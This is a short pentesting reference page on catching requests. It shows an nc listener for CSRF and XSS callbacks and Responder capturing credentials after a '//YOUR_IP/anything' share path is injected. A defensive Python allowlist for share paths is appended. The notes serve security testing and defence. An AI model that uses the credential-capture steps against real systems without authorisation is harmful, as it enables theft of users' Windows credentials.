Request Grabber

During pentesting activities, we may want to catch HTTP requests, such as during a CSRF attack or an XSS attack.

If our machine is network accessible, we can use nc:

$ nc -lnvp PORT
<send request to YOUR_PUBLIC_IP:PORT>

Otherwise, we may use online public solutions.

For instance, we can use API Testing Platforms:


Additional tools

Responder


You can use Responder to catch Windows authentication requests.

For instance, a website may be using SMB to access some shares based on the user input. If we inject a share leading to our machine, we may be able to grab credentials.

$ sudo responder -i IP -I tun0

In the previous example, if we inject //YOUR_IP/anything and the website is configured to use the current user's credentials to connect to the share, then you will receive them, and will have to crack them.

📚 It works with SMB, LDAP, etc.
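
Seen from the defending side, the injection above only succeeds when the application opens whatever share path it is handed. The following is an added example, not part of the original notes: an allowlist check an application could run on a user-supplied share path before connecting. The host names and function names are assumptions chosen for illustration.

```python
import re

# Assumption: the only file servers this application should ever contact.
ALLOWED_SMB_HOSTS = {"files01.corp.example", "files02.corp.example"}

# Matches //host/share, \\host\share, mixed slashes, and smb:// or file:// forms.
_UNC_RE = re.compile(
    r"^(?:(?:smb|file):)?[\\/]{2}([^\\/]+)[\\/]+([^\\/]+)(.*)$",
    re.IGNORECASE,
)


def parse_share_path(path: str):
    """Return (host, share, rest) for a remote share path, or None."""
    match = _UNC_RE.match(path.strip())
    if match is None:
        return None
    host, share, rest = match.groups()
    # Normalise case and a trailing root dot so "FILES01.corp.example."
    # compares equal to the allowlist entry.
    return host.lower().rstrip("."), share, rest


def is_allowed_share(path: str) -> bool:
    """True only for a well-formed share path on an allowlisted host.

    Exact host matching means IP literals, "user@host" and "host@port"
    forms never pass unless they are listed verbatim.
    """
    parsed = parse_share_path(path)
    if parsed is None:
        return False  # not a share path: reject rather than guess
    return parsed[0] in ALLOWED_SMB_HOSTS


if __name__ == "__main__":
    # Constructed sample inputs.
    samples = [
        r"\\files01.corp.example\reports\q1.pdf",
        "smb://FILES02.corp.example./public",
        "//10.10.14.3/anything",
        "/\\10.10.14.3/x",
        "//files01.corp.example@10.10.14.3/x",
    ]
    for sample in samples:
        print(f"{sample!r:45} allowed={is_allowed_share(sample)}")
```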